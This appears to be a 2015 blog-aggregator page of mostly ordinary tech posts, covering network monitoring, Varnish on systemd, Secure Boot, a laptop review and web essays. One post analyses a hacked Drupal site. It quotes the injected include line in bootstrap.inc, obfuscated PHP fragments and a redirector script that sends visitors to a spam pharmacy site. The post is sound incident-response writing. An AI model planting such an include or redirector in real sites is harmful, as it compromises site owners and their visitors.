But today, more and more devices are connected (think about the IoT-buzz – “Internet of Things“). These devices are manufactured in a way that they automatically use any available network connectivity. Configure a wireless network and they are good to go. Classic home networks are based on xDSL or cable modems which provide basic network services (DHCP, DNS). This is not the best way to protect your data. They lack of egress filters and any connected device will have a full network connectivity and potentially exfiltrate juicy data. That’s why I militate in favour of a documentation template to describe the resources required to operate such “smart” devices smoothly. Here is an good example. I’ve a Nest thermostat installed at home and it constantly connects to the following destinations:

54.227.140.192.9543
23.21.241.75.443
23.23.91.51.80
54.243.35.110:443
87.106.208.187:80

It’s easy to make your home network safer without spending a lot of time and money. When a new device is connected to my network, it receives a temporary IP address from a small DHCP pool (Ex: 192.168.0.200-210). This pool has a very limited network connectivity. It uses a local DNS resolver (to track used domains) and is only allowed to communicate over HTTPS to the Internet. A Snort IDS and a tcpdump are constantly running to capture and inspect all packets generated by the IP addresses from the DHCP pool. This is easy to configure with the following shell script running in the backgound.

#!/bin/bash
while true
do
    TODAY=`/bin/date +"%Y%m%d"`
    /usr/sbin/tcpdump -i eth1 -lenx -X -s 0 -w /data/pcaps/tcpdump-$TODAY.pcap \
        host 192.168.0.200 or \
             192.168.0.201 or \
             192.168.0.202 or \
             192.168.0.203 or \
             192.168.0.204 or \
             192.168.0.206 or \
             192.168.0.207 or \
             192.168.0.208 or \
             192.168.0.209 or \
             192.168.0.210 &
    TCPDUMP_PID=$!
    sleep 86400 # Go to sleep for one day
    kill $TCPDUMP_PID
    gzip -9 /data/pcaps/tcpdump-$TODAY.pcap
done

When a new device is connected, its traffic is automatically captured and can be analyzed later. Once completed, a static DHCP lease is configured with the device MAC address and the firewall policy adapted to permit the required traffic. Not only, it helps to secure your network but it can reveal interesting behaviors.

by Xavier at March 17, 2015 07:29 AM

March 16, 2015

Mattias Geniar

Forthcoming OpenSSL releases

The post Forthcoming OpenSSL releases appeared first on ma.ttias.be.

Let's hope this isn't as bad as it sounds.

Forthcoming OpenSSL releases
============================

The OpenSSL project team would like to announce the forthcoming release
of OpenSSL versions 1.0.2a, 1.0.1m, 1.0.0r and 0.9.8zf.

These releases will be made available on 19th March. They will fix a
number of security defects. The highest severity defect fixed by these
releases is classified as "high" severity.

Yours

The OpenSSL Project Team

The good news is, OpenSSL isn't dead. The bad news is, we may have a new heartbleed on our hands.

The post Forthcoming OpenSSL releases appeared first on ma.ttias.be.

by Mattias Geniar at March 16, 2015 10:09 PM

Lionel Dricot

Je ne veux plus conduire !

OK, let me drive...

Je ne veux plus conduire car j’ai l’impression de perdre mon temps. Lorsque je conduis, je ne peux ni lire, ni écrire, ni admirer, ni respirer, ni rêver, ni me défouler, ni aimer, ni faire plaisir, ni me faire plaisir. 1h30 de conduite par jour, et on y est plus vite qu’on ne l’imagine, représente un sacrifice de 10% de notre temps éveillé, 10% de notre vie.

Je ne veux plus conduire car la conduite est morbide. Assis, sans pouvoir bouger, mes muscles s’atrophient, se contractent, se rigidifient. La position force mes poumons à se refermer. De toutes façons, je ne fais que respirer les gaz d’échappement de ceux qui me précèdent. Il suffit de voir la couleur que prend la neige au bord d’une route pour réaliser que nos poumons font de même. Au fond, conduire n’est pas très éloigné de la torture physique.

Je ne veux plus conduire car je n’aime pas risquer ma vie en permanence. Lancé dans un bolide de métal à des vitesses folles, mon esprit doit être en permanence alerte, aux aguets. Je dois prévoir les comportements erratiques des autres conducteurs, anticiper les conditions difficiles. Ma vie est en jeu ! Si je l’oublie et que je me détends, bercé par l’habitude d’un trajet journalier et la confiance en mes talents, je ne fais qu’ignorer un danger exacerbé par mon insouciance. Et je me transforme en criminel potentiel…

Je ne veux plus conduire car je ne veux plus soutenir le véritable culte qui entoure désormais l’automobile. D’utilitaire, elle est devenue religion. Les constructeurs les font brillantes et volontairement fragiles. L’adoration liturgique se fait dans les grands salons annuels et dans les discussions de tous les jours. Effleurer une voiture en stationnement la fera hurler, y laisser une griffe, même ténue et involontaire, vous transformera en ennemi public, en criminel haï et poursuivi. Rien que critiquer le dieu automobile fait de moi un paria.

Je ne veux plus conduire car toute notre société est aux ordres de l’automobile. Tous nos paysages sont entièrement adaptés à la conduite. Nos routes ne déservent plus nos maisons, ce sont nos maisons qui déservent les routes. De monstrueuses arches de bétons s’élèvent autour des villes et à travers les campagnes. Un grondement continu rugit et assourdit. Personne n’oserait bloquer, ne fut-ce que quelques minutes, les passages d’automobiles. Alors qu’au même endroit il n’est pas rare de laisser des trottoirs ou des pistes cyclables encombrées pendant des mois, forçant les non-automobilistes à risquer leur vie. C’est bien simple : me rendre à vélo au travail compte plus de kilomètres qu’en voiture car les voies rapides les plus directes sont strictement réservées aux automobiles.

Je ne veux plus conduire car l’automobile est devenue une guerre. J’ai vu trop de sacrifices, de jeunes vies fauchées. Les personnes que j’ai connues et qui sont mortes avant leur 50 ans ont, dans leur immense majorité, été tuées par l’automobile. Certains qui ne sont pas morts sont restés handicapés à vie. Aujourd’hui encore, malgré parfois plusieurs lustres, je revis régulièrement ces terribles secondes où j’ai appris la mort d’un proche, d’une fréquentation ou d’une vague connaissance. Je reste profondément choqué par la violente soudaineté de ces injustices. Tout en sachant que je pourrais bien être la prochaine victime ou le prochain assassin.

Je ne veux plus conduire car quand je vois des jeunes pleins de vie dilapider leur premier salaire dans l’automobile, quand je les vois faire vrombir leur moteur, faire crisser les pneus, je sais qu’un jour ils se retourneront contre nous, qu’ils nous montreront leurs blessures, leurs morts, leur terre meurtrie et qu’ils nous diront : “Pourquoi nous avez-vous enseigné cette religion ? Pourquoi nous avez-vous laissé faire ? Pourquoi avez-vous retardé toutes les innovations qui permettaient de se débarrasser de l’automobile ? Est-ce que l’industrie de l’automobile méritait une seule de nos vies ?”.

Je ne veux plus conduire car je sais que mes descendants me regarderont comme un criminel en me disant “Tout cela uniquement dans le but de se déplacer ?”. Et ils auront raison.

 

Photo par F Mira. Lectures suggérées : La proclamation, L’inauguration du RER, La voiture, 1er front de la guerre à l’innovation.

Merci d'avoir pris le temps de lire ce billet librement payant. Prenez la liberté de me soutenir avec quelques milliBitcoins, une poignée d'euros, en me suivant sur Tipeee, Twitter, Google+ et Facebook !

Ce texte est publié par Lionel Dricot sous la licence CC-By BE.

flattr this!

by Lionel Dricot at March 16, 2015 04:04 PM

March 15, 2015

Mattias Geniar

Running Varnish 4.x on systemd

The post Running Varnish 4.x on systemd appeared first on ma.ttias.be.

If you're thinking about running Varnish 4.x on a systemd system, you may be surprised that many of your "older" configs no longer work.

Now I don't mean the actual VCL files, those have a seriously changed syntax and there are proper documentations on handling a 3.x to 4.x upgrade.

I mean the /etc/sysconfig/varnish config, that will no longer work in a systemd world. It's being replaced by a /etc/varnish/varnish.params file, that is being included by systemd.

To see what's going on under the hood, check out the systemd configuration file at /usr/lib/systemd/system/varnish.service.

$ cat /usr/lib/systemd/system/varnish.service
[Unit]
Description=Varnish a high-perfomance HTTP accelerator
After=syslog.target network.target

[Service]
# Maximum number of open files (for ulimit -n)
LimitNOFILE=131072

# Locked shared memory (for ulimit -l)
# Default log size is 82MB + header
LimitMEMLOCK=82000

# Maximum size of the corefile.
LimitCORE=infinity

EnvironmentFile=/etc/varnish/varnish.params

Type=forking
PIDFile=/var/run/varnish.pid
PrivateTmp=true
ExecStartPre=/usr/sbin/varnishd -C -f $VARNISH_VCL_CONF
ExecStart=/usr/sbin/varnishd \
	-P /var/run/varnish.pid \
	-f $VARNISH_VCL_CONF \
	-a ${VARNISH_LISTEN_ADDRESS}:${VARNISH_LISTEN_PORT} \
	-T ${VARNISH_ADMIN_LISTEN_ADDRESS}:${VARNISH_ADMIN_LISTEN_PORT} \
	-t $VARNISH_TTL \
	-u $VARNISH_USER \
	-g $VARNISH_GROUP \
	-S $VARNISH_SECRET_FILE \
	-s $VARNISH_STORAGE \
	$DAEMON_OPTS

ExecReload=/usr/sbin/varnish_reload_vcl

[Install]
WantedBy=multi-user.target

Most importantly, it loads the file /etc/varnish/varnish.params that can/should contain environment variables, that you can use to manipulate the systemd service.

At the very end, it contains the $DAEMON_OPTS variable. Previous sysconfig files would have that contain the entire startup parameter for varnish, including the -a parameter (what port to listen on), -S (the secret file), ... etc. With the Varnish 4.x configs on systemd, the $DAEMON_OPTS should only contain the additional parameters that aren't already specified in the varnish.service file.

For example, you should limit the varnish.params file to something like this.

$ cat /etc/varnish/varnish.params
# Varnish environment configuration description. This was derived from
# the old style sysconfig/defaults settings
RELOAD_VCL=1
VARNISH_VCL_CONF=/etc/varnish/default.vcl
VARNISH_LISTEN_PORT=80
VARNISH_ADMIN_LISTEN_ADDRESS=127.0.0.1
VARNISH_ADMIN_LISTEN_PORT=6082
VARNISH_SECRET_FILE=/etc/varnish/secret
VARNISH_STORAGE="file,/var/lib/varnish/varnish_storage.bin,1G"
VARNISH_TTL=120
VARNISH_USER=varnish
VARNISH_GROUP=varnish
#DAEMON_OPTS="-p thread_pool_min=5 -p thread_pool_max=500 -p thread_pool_timeout=300"

If you're migrating from a sysconfig-world, one of the most important changes is that the systemd-config requires a user and group environment variable, which wasn't set previously.

$ cat /etc/varnish/varnish.params
...
VARNISH_USER=varnish
VARNISH_GROUP=varnish
...

For all other changed parameters in the $DAEMON_OPTS list, check out the Varnish man-pages (man varnishd) that contain very accurate documentations on what parameters are allowed and which have been changed.

The post Running Varnish 4.x on systemd appeared first on ma.ttias.be.

by Mattias Geniar at March 15, 2015 08:26 PM

Debug Varnish 4.x on systemd That Fails to Start

The post Debug Varnish 4.x on systemd That Fails to Start appeared first on ma.ttias.be.

So you're stuck in systemctl start varnish, now what?

Well, by default, systemd won't tell you much.

$ systemctl start varnish
Job for varnish.service failed. See 'systemctl status varnish.service' and 'journalctl -xn' for details.

View the status of the service:

$  systemctl status varnish
varnish.service - Varnish a high-perfomance HTTP accelerator
   Loaded: loaded (/usr/lib/systemd/system/varnish.service; enabled)
   Active: failed (Result: exit-code) since Sun 2015-03-15 21:07:41 CET; 15s ago
  Process: 10062 ExecStart=/usr/sbin/varnishd -P /var/run/varnish.pid -f $VARNISH_VCL_CONF -a ${VARNISH_LISTEN_ADDRESS}:${VARNISH_LISTEN_PORT} -T ${VARNISH_ADMIN_LISTEN_ADDRESS}:${VARNISH_ADMIN_LISTEN_PORT} -t $VARNISH_TTL -u $VARNISH_USER -g $VARNISH_GROUP -S $VARNISH_SECRET_FILE -s $VARNISH_STORAGE $DAEMON_OPTS (code=exited, status=2)
  Process: 10049 ExecStartPre=/usr/sbin/varnishd -C -f $VARNISH_VCL_CONF (code=exited, status=0/SUCCESS)
 Main PID: 6187 (code=exited, status=0/SUCCESS)

site.be varnishd[10049]: .miss_func = VGC_function_vcl_miss,
site.be varnishd[10049]: .hit_func = VGC_function_vcl_hit,
site.be varnishd[10049]: .deliver_func = VGC_function_vcl_deliver,
site.be varnishd[10049]: .synth_func = VGC_function_vcl_synth,
site.be varnishd[10049]: .backend_fetch_func = VGC_function_vcl_backend_fetch,
site.be varnishd[10049]: .backend_response_func = VGC_function_vcl_backend_response,
site.be varnishd[10049]: .backend_error_func = VGC_function_vcl_backend_error,
site.be varnishd[10049]: .init_func = VGC_function_vcl_init,
site.be varnishd[10049]: .fini_func = VGC_function_vcl_fini,
site.be varnishd[10049]: };

It'll show the message that Varnish failed to start, and it will show the last 10 lines of output the program sent to stdout/stderr. But in Varnish' case, that's just the compiled VCL and it won't actually tell you the error.

To start, test the syntax of your Varnish 4 VCL file.

$ varnishd -d -f /etc/varnish/default.vcl
...
-----------------------------
Varnish Cache CLI 1.0
-----------------------------
...

If you see a "Varnish Cache CLI", your VCL compiled and is working. That means the problem could be in the way systemd starts its service.

$ grep systemd /var/log/messages
Mar 15 21:07:41 lb01 systemd: Starting Varnish a high-perfomance HTTP accelerator...
Mar 15 21:07:41 lb01 systemd: varnish.service: control process exited, code=exited status=2
Mar 15 21:07:41 lb01 systemd: Failed to start Varnish a high-perfomance HTTP accelerator.
Mar 15 21:07:41 lb01 systemd: Unit varnish.service entered failed state.

So in this case, systemd failed to start the service with my requested parameters. Check your varnish.service in /usr/lib/systemd/system/varnish.service file for any typos or mis-configured environment variables and try again!

The post Debug Varnish 4.x on systemd That Fails to Start appeared first on ma.ttias.be.

by Mattias Geniar at March 15, 2015 08:14 PM

March 13, 2015

Wim Coekaerts

Secure Boot support with Oracle Linux 7.1

Update : as my PM team pointed out to me - it's listed as Tech Preview for OL7.1 not GA/production in the release notes - just making sure I add this disclaimer ;)

Another feature introduced with Oracle Linux 7.1 is support for Secure Boot.

If Secure Boot is enabled on a system (typically desktop, but in some cases also servers) - the system can have an embedded certificate (in firmware). This certificate can be one that's uploaded to the system by the admin or it could be one provided by the OEM/OS vendor. In many cases, in particular newer desktops, the system already contains the Microsoft key. (there can be more than one certificate uploaded...). When the firmware loads the boot loader, it verifies/checks the signature of this bootloader with the key stored in firmware before continuing. This signed bootloader (at this point trusted to continue) will then load a signed kernel, or signed second stage boot loader and verify it before starting and continuing the boot process. This creates what is called a chain of trust through the boot process.

We ship a 1st stage bootloader with Oracle Linux 7.1 which is a tiny "shim" layer that is signed by both Microsoft and Oracle. So if a system comes with Secure Boot support, and already ships the microsoft PK, then the shim layer will be started, verified, and if it passes verification, it will then load grub2 (the real bootloader). grub2 is signed by us (Oracle). The signed/verified shim layer contains the Oracle key and will validate that grub2 is ours (signed), if verification passes, grub2 will load the Oracle Linux kernel, and the same process takes place, our kernel is signed by us (Oracle) and grub2 will validate the signature prior to allowing execution of the kernel. Once the kernel is running, all kernel modules that we ship as part of Oracle Linux whether it's standard included kernel modules as part of the kernel RPM or external kernel modules used with Oracle Ksplice, are also signed by Oracle and the kernel will validate the signature prior to loading these kernel modules.

Enabling loading and verification of signed kernel modules is done by adding enforcemodulesig=1 to the grub kernel option line. In enforcing mode, any kernel module that is attempted to be loaded that's not signed by Oracle will fail to load.

If a system has Secure Boot support but a sysadmin wants to use the Oracle signature instead, we will make our certificate available to be downloaded securely from Oracle and then this can be uploaded into the firmware key database.

by Wcoekaer-Oracle at March 13, 2015 06:04 PM

Wouter Verhelst

New toy: Fujitsu Lifebook e734

My Lenovo x220, which I've owned for almost four years now (I remember fetching it from the supplier shortly before driving off to Banja Luka), was getting somewhat worn out. The keyboard and the screen had both been replaced at some point already, and the wwan interface had given up as well. The case was all cracked, and the NIC connector wasn't doing very well anymore either; there have been a few cases of me trying to configure the wireless network at a customer, but this being harder than it needs to be because the NIC will only work if I put in the network cable just so, and someone dropped a piece of paper onto the cable.

In other words, it was time for a new one. At first I wanted to buy a Lenovo x250, but then I noticed that the Fujitsu came with an i7 4712MQ, which I liked (as today it is still quite exceptional for an ultrabook to have a quadcore processor). Fujitsu also claims up to 9 hours of battery life, but it's not clear to me whether this is supposed to be the case with the default battery only. They also have a battery for the modular bay, which I bought as well (to replace the optical drive whic I sometimes use, but only rarely), and on top of that it came with a free port replicator.

Not all is well, however. In the x220, getting the WWAN interface to work involved some creative use of chat against /dev/ttyACM0 wherein I issue a few AT commands to put the WWAN interface into a particular mode, and from then on the WWAN interface is just a regular Ethernet interface on which I can do DHCP. The new laptop has a "Sierra Wireless, Inc." WWAN interface (USB id 1199:9041) which annoyingly doesn't seem to expose the ttyACM (or similar) devices, and I'm not sure what to use instead. Just trying to do DHCP doesn't work -- yes, I tried.

Unfortunately, the keyboard isn't very good; it's of the bubble gum type, and I keep getting annoyed at it not picking up my keystrokes all the time. When I'm at home or at my main customer, I have a Das Keyboard Ultimate S (3rd (customer) and 4th (home) generation), so it's only a problem when I'm not at home, but it's still extremely annoying. There is a "backlight" function in that keyboard, but that's not something I think I'll ever use (hint: "das keyboard ultimate s").

The display can't do more than 1366x768, which is completely and utterly wrong for a computer -- but it's the same thing as my x220, so it's not really a regression.

The "brightness" ACPI keys don't seem to work. I may have to fiddle with some ACPI settings at some point, I suppose, but it's not a major problem.

When I plugged it in, I noticed that fdpowermon ignored the second battery. I had originally written fdpowermon with support for such a second battery, but as my x220 had only one, I never tested it. Apparently there was a bug, but that's been fixed now -- at least in unstable.

On the good side of the equation, it has three USB3 ports in the laptop, and four in the port replicator, with no USB2; this is a major leap forwards from the one USB3 and six USB2 in the x220. A positive surprise was the CCID smartcard reader that I somehow missed while reading the specs, but which -- given my current major customer, is very welcome, indeed.

Update: After having used it a few days, there were a few minor annoyances:

March 13, 2015 04:30 PM

Xavier Mertens

Expanding your CMS at your own risk!

Car TuningCMS or “Content Management Systems” became vey common for a few years. Popular CMS are WordPress, Drupal or Joomla. You can rent some space at a hosting provider for a few bucks or even find free hosting platforms. You can deploy them in a few minutes on your own server. Then, you just have to focus on the content: No need to learn CSS/HTML!

For me, modern CMS have a common point with cars: Their owners like to customize them. The “car tuning” is very popular and is the modification of the performance or appearance of a vehicle. Millions of people like to modify their cars, there is a huge business driven by the car tuning.

We can make a rough comparison between cars and CMS. Your CMS can also be tuned. Most CMS offer a way to extend the features or the look’n’feel via plugins (or add-ons or extensions – whatever you name them). Some examples of commons plugins:

I won’t discuss about the look-n-feel of a websites. Some plugins can completely revamp a website, taste and colours are not always the same. But let’s focus on security. Car engine performances can be modified by adding or reprogramming chips. It’s easy and cheap to gain some horsepower but this could have a huge security impact. Want an example? Brakes or suspensions are designed to stop and maintain on the road a car with a set of known specifications (weight, power) but if you change one parameter, this could have a big impact on you and your security passengers. A Ferrari and a Renault Megane don’t have the same brakes. It’s exactly the same with CMS plugins: they can alter your CMS security.

If most CMS source code is regularly audited and well maintained. It’s not the same for their plugins. By definition, a plugin is a piece of code that adds a specific feature to an existing application. Keep in mind: by using plugins, you change the way the original software will behave. And not all plugins are developed by skilled developers or with security in mind. Today, most vulnerabilities reported in CMS environment are due to … plugins! Here are some tips to increase your CMS security.

  1. Only install plugins that your really need.
  2. Some plugins can be configured. Always review the default settings and adapt them to your environment and security requirements
  3. If you decide to not use a plugin, disable and un-install it completely.
  4. Do NOT rely on a plugin popularity. It’s not because it is used by many webmasters that it is safe! By contrast, it will maybe be a nice target to compromize more sites.
  5. Like any pice of software, update them
  6. Take a deep breath and jump into the code to have a quick code review (any backdoor installed?)

Also, keep in mind that installed plugins can be listed by scanners and crawlers. WordPress has an hardening guide with good recommendations.

by Xavier at March 13, 2015 09:53 AM

Wim Coekaerts

Oracle Linux 7.1 and MySQL 5.6

Yesterday we released Oracle Linux 7 update 1. The individual RPM updates are available from both public-yum (our free, open, public yum repo site) and Oracle Linux Network. The install ISOs can be downloaded from My Oracle Support right away and the public downloadable ISOs will be made available in the next few days from the usual e-delivery site. The ISOs will also, as usual, be mirrored to other mirror sites that also make Oracle Linux freely available.

One update in Oracle linux 7 update 1 that I wanted to point out is the convenience of upgrading to MySQL 5.6 at install time. Oracle Linux 7 GA includes MariaDB 5.5 (due to our compatibility commitment in terms of exact packages and the same packages) and we added MySQL 5.6 RPMs on the ISO image (and in the yum repo channels online). So while it was easy for someone to download and upgrade from MariaDB 5.5 to MySQL 5.6 there was no install option. Now with 7.1 we included an installation option for MySQL. So you can decide which database to install in the installer or through kickstart with @mariadb or @mysql as a group. Again, MariaDB 5.5 is also part of Oracle Linux 7.1 and any users that are looking for strict package compatibility will see that we are very much that. All we have done is make it easy to have a better alternative option (1) conveniently available and integrated (2) without any compatibility risks whatsoever so you can easily run the real standard that is MySQL. A bug fix if you will.

I have a little screenshot available here.

Enjoy.

by Wcoekaer-Oracle at March 13, 2015 03:47 AM

March 12, 2015

Frank Goossens

Music from Our Tube: The Bad Plus covering Aphex Twin’s Flim

Didn’t know this nice jazz-tune was an Aphex Twin cover, but it sure is. Anyway, here’s the cover (and then some more) by The Bad Plus, live:

YouTube Video
Watch this video on YouTube or on Easy Youtube.

by frank at March 12, 2015 05:42 PM

March 10, 2015

Dries Buytaert

The Big Reverse of the Web

I believe that for the web to reach its full potential, it will go through a massive re-architecture and re-platforming in the next decade. The current web is "pull-based", meaning we visit websites or download mobile applications. The future of the web is "push-based", meaning the web will be coming to us. In the next 10 years, we will witness a transformation from a pull-based web to a push-based web. When this "Big Reverse" is complete, the web will disappear into the background much like our electricity or water supply. We'll forget what 'www' stood for (which was kind of dumb to begin with). These are bold statements, I understand, but let me explain you why.

In the future, content, products and services will find you, rather than you having to find them. Puma will let us know to replace our shoes and Marriott will automatically present you room options if you missed your connecting flight. Instead of visiting a website, we will proactively be notified of what is relevant and asked to take action. The dominant function of the web is to let us know what is happening or what is relevant, rather than us having to find out.

Facebook and Flipboard are early examples of what such push-based experience looks like. Facebook "pushes" a stream of personalized information designed to tell you what is happening with your friends and family; you no longer have "pull" them and ask how they are doing. Flipboard changes how we consume content by aggregating the best of the web and filtering it based on our interests; it "pushes" the relevant and interesting content to you rather than you having to "pull" the news from multiple sources. Also consider the rise of notification-centric experiences; your smartphone's notification center provides you with a stream of relevant information that is pushed to you. More recently, these notifications have become interactive; you can check in for a flight without having to open your travel app. You can buy a product without having to visit their website.

What people really want is to tune into information rather than having to work to get information. It saves them time and effort and in the long run, an improved user experience always wins. In most cases, "Show me what I want" is more useful than "Let me search around and see what I can find".

With some imagination, it's not too hard to picture how these kind of experiences could expand to other areas of the web. The way the e-commerce works today is really no different than having to visit a lot of separate physical stores or wading through hundreds of products in a department store. We shouldn't have to work so hard to find what we want. In a push-based world, we would sit back as if we were watching a fashion show -- the clothing presented could come for hundreds of different online brands but the stream is "personalized" to our needs, budget, sizes and style preferences. When the Big Reverse is complete, it will be the end of department stores and malls. Keep an eye on personalized clothing services like Trunk Club or Stitch Fix.

Ten years from now we're going to look back and recognize that search-based content discovery was broken. Today the burden is put on the user to find relevant content either via directly typing in a URL or by crafting complex search queries. While pull-based experiences might not go away; push-based experiences will dominate as they will prove to be much more efficient.

Many of you won't like it (at first), but push will win over pull. Healthcare is going through a similar transformation from pull to push; instead of going to a doctor, we'll have web-enabled hardware and software that is able to self-diagnose. Wearables like activity trackers are just the start of decades of innovation and opportunity in healthcare. Helped by the web, education is also moving from pull to push. Why go to a classroom when personalized training can come to you?

We are at the beginning of a transition bridging two distinctly different types of economies. First, a "push economy" that tries to anticipate consumer demand, creates standardized or generic products in large amounts, and "pushes" them into the market via global distribution channels and marketing. Now, a "pull economy" that—rather than creating standardized products—will create highly customized products and services produced on-demand and delivered to consumers through one-on-one relationships and truly personal experiences.

This new paradigm could be a very dramatic shift that disrupts many existing business models; advertising, search engines, app stores, online and offline retailers, and much more. For middlemen like online retailers or search engines, the push-based means they risk being disintermediated as the distribution chain becomes less useful. It marks a powerful transformation that dematerializes and de-monetizes much of the current web. While this might complicate the lives of many organizations, it will undoubtedly simplify and better the lives of consumers everywhere.

by Dries at March 10, 2015 10:08 AM

Frank Goossens

QuirksMode: “The problem with Angular”

I’ve previously already expressed my doubts about the how well-suited AngularJS is for mobile web development (in Dutch, though, as I was discussing the merits of the mobile news-site of the Flemish broadcaster VRT).

QuirksMode’s PPK dove in a lot deeper in his “The problem with Angular“, stating amongst other things;

Angular is aimed at corporate IT departments rather than front-enders, many of whom are turned off by its peculiar coding style, its emulation of an HTML templating system that belongs on the server instead of in the browser, and its serious and fundamental performance issues. I’d say Angular is mostly being used by people from a Java background because its coding style is aimed at them. Unfortunately they aren’t trained to recognize Angular’s performance problems.

The performance problems PPK mentions are not the initial download of angular.js in the browser (which is one of the reasons why I dislike it), but the fact that angular.js does a huge amount of DOM-manipulations, which are costly, especially on mobile. This quote says it all;

Although templating is the correct solution, doing it in the browser is fundamentally wrong. The cost of application maintenance should not be offloaded onto all their users’s browsers — especially not the mobile ones. This job belongs on the server.

But do read PPK’s article for more insights on Angular and the road it is heading down with AngularJS 2.0!

by frank at March 10, 2015 09:26 AM

Mattias Geniar

Virtual Reality As The Next Step After Reponsive Webdesign?

The post Virtual Reality As The Next Step After Reponsive Webdesign? appeared first on ma.ttias.be.

Mozilla has a impressive demosite running at MozVR.com.

Over the last few years, the web has evolved from a static, fixed width environment to a fully responsive design. What if the next step is Virtual Reality, ported to the webbrowser?

It requires VR hardware (Oculus Rift, Google Cardboard, Sony's Project Morpheus, ...), which hardly anyone has. And it requires Firefox Nightly, which is easier to get.

If those conditions aren't met, the site and its demos won't work.

mozvr_firefox_vr_oculus

But the site offers a whole lot more than just the demos: it features an active blog and some impressive WebGL based Virtual Reality demos that work even without the Oculus.

mozvr_sechelt_demo

There's even a demo available for use with the Leap Motion.

What if, in 5 to 10 years from now, we'll consider Responsive Webdesign a thing of the past and Virtual or Augmented Reality is the new hype?

The current hardware for Virtual Reality is bulky, low-res and has a high latency. But if technology has thought us one thing, it's that hardware gets smaller, faster and cheaper. In the not-so-distant future, Virtual Reality hardware can be as common as wearing contact lenses or normal glasses.

Imagine the visualisations possible with VR. Complex data structures that now use d3js can be viewed in a full 360 degree view. Website navigations and controls can be outside of the normal view and used by tilting your head or viewing left/right. Depth can be used to zoom-in to a website.

What if Virtual Reality really is the future of the web?

The post Virtual Reality As The Next Step After Reponsive Webdesign? appeared first on ma.ttias.be.

by Mattias Geniar at March 10, 2015 07:50 AM

March 09, 2015

Mattias Geniar

Drupal engine_ssid_ And engine_ssl_ cookies: You’ve Been Hacked

The post Drupal engine_ssid_ And engine_ssl_ cookies: You’ve Been Hacked appeared first on ma.ttias.be.

If you're seeing the cookies engine_ssid_ and engine_ssl_ being set in your Drupal site, chances are your Drupal installation has been hacked.

Detecting the hack

If you open your Inspector tab in Chrome/Firefox, you can see the following cookies set for your site.

drupal_engine_ssid_cookies

The value of the engine_ssid_ cookie is always ieuakakai_$timestamp, so a random value for everyone. You're most likely finding these cookies because you're investigating a caching issue, where your cache hit-rates are dropping. The reason is this cookie, as it sets a cookie with a unique timestamp for every visitor.

Finding the infected files on the filesystem

My investigations have, on numerous installations, always lead to the directory misc/farbtastic/, where new PHP files were being dropped. Farbtastic is supposed to be jQuery Color Picker, so you wouldn't expect PHP files in here -- right?

$ ls -alh misc/farbtastic/*.php
-rw-r--r-- 1 user group 100K misc/farbtastic/cache.php
-rw-r--r-- 1 user group 297  misc/farbtastic/leftpanelsin.php

The content of those files is what you would expect: typical obfuscated PHP code.

$ more misc/farbtastic/cache.php
<?php $GLOBALS['_1850119110_']=Array(base64_decode('ZXJyb3JfcmV' .'wb3J0a' .'W' .'5n'),base64_decode('c3' .'RyX3Jlc' .'Gx' .'hY2U='),base
...

This piece of PHP code can do harm in 2 ways: either it's included in the Drupal codebase, calling it on every page load, or it's loaded as an AJAX request in the browser. This particular piece of infection is the former: it gets included in the bootstrap of Drupal, so it's present on every request made to the server.

$ more includes/bootstrap.inc
...
**
* First bootstrap phase: initialize configuration.
*/@include_once( DRUPAL_ROOT . '/misc/farbtastic/cache.php');
define('DRUPAL_BOOTSTRAP_CONFIGURATION', 0);

The Drupal bootstrap is what actually initialises the entire Drupal stack. By injecting it in there, this malware can be sure it's present on every PHP request processed by Drupal.

There should be actual bonus points awarded to this malware for adhering to the Drupal Coding Standards for its use of spaces and concatenation, although it's probably just a means for blending in better and staying hidden in the bootstrap file.

Update 12/3/2015, thanks to Dimitri in the comments.

There's also an infection in the includes/refresh.inc file, with more obfuscated code.

$ more includes/refresh.inc
...
$GLOBALS['_2008785826_']=Array(base64_decode('Z' .'XJ' .'yb' .'3' .'J' .'f' .'c' .'mVwb3J0' .'a' .'W5n'),base64_decode
...

What does it do?

Besides dropping in cookies that can mess up with your caching strategy, this infection can do quite a bit more. After all, just busting caches everywhere may be fun, but that doesn't get you anywhere.

There are 2 parts to this infection, one is a simple redirecter in the form of leftpanelsin.php, which I've prettified here.

$ more misc/farbtastic/leftpanelsin.php
<?php
if( $_REQUEST["q"] == "pharmacy") {
   header("Location: http://www.-removed-url-.com/?refid=xx&trackid=xx&q=". $_REQUEST["q"], true, 302);
}
else {
   header("Location: http://www.-removed-url-.com/catalog/Bestsellers/". $_REQUEST["q"] .".htm?refid=xx&trackid=xx&q=". $_REQUEST["q"], true, 302);
}
exit;
?>

The sole purpose of this files, is to be called directly via the browser. Most likely due to either a javascript <script> injection or an iframe. It'll redirect the browser/visitor to an affiliate site.

The more complicated piece of code is the cache.php file. You can find the original cache.php version here.

Farbtastic Drupal Hack

An attempt to deobfuscate the code can be found here.

Farbtastic Drupal Hack Deobfuscated

In both cases, it's still entirely unreadable. Someone went through great lengths to hide the true purpose of this script. No simple de-obfuscater can decode this, it would require a tremendous amount of work to get a readable version.

It is filled with $_GLOBAL's, random function names, math, arrays, ... Honestly, that something even comes out of it is a victory on its own.

Finding The Source

How it got there? Most likely an out-of-date plugin. Or maybe Drupalgeddon. By looking at the timestamps of most of the infected files, this isn't a new breach. But it's something that appears to have been keeping quiet.

As far as I could tell, the only way to spot it were the included new Cookies on the site. No signs of abuse, nowhere in the access/maillogs, could be found.

Is this a botnet quietly starting to gain ground, or an old hack that just never got activated? I wish I could tell you, but I'm hoping for the latter.

The post Drupal engine_ssid_ And engine_ssl_ cookies: You’ve Been Hacked appeared first on ma.ttias.be.

by Mattias Geniar at March 09, 2015 08:58 PM

Joram Barrez

Getting started with Activiti and Spring Boot published on The Spring Blog!

My article “Getting started with Activiti and Spring Boot” has been published today on The Spring Blog: https://spring.io/blog/2015/03/08/getting-started-with-activiti-and-spring-boot It fills me with great pride to be published there. I’ve been a fan of Spring for many years and believe that it houses many of the awesome developers in current Java-land. Anyway, please give the article […]

by Joram Barrez at March 09, 2015 02:05 PM

Frederic Hornain

[Red Hat][Docker] Check your Dockerfile syntax

Dockerfile tool

Dockerfile tool

Type or paste your Dockerfile into the editor, or load it into

https://access.redhat.com/labs/linterfordockerfile/#/

and check if you syntax is correct.

 

Kind Regards

Frederic

 

 

 

 

 

 

 

 

 

 

 


by Frederic Hornain at March 09, 2015 10:28 AM

March 08, 2015

Frederic Hornain

[Brussels] Red Hat JBoss Fuse Free hands-on lab on March 12 2015

Red Hat Benelux Workshop

 

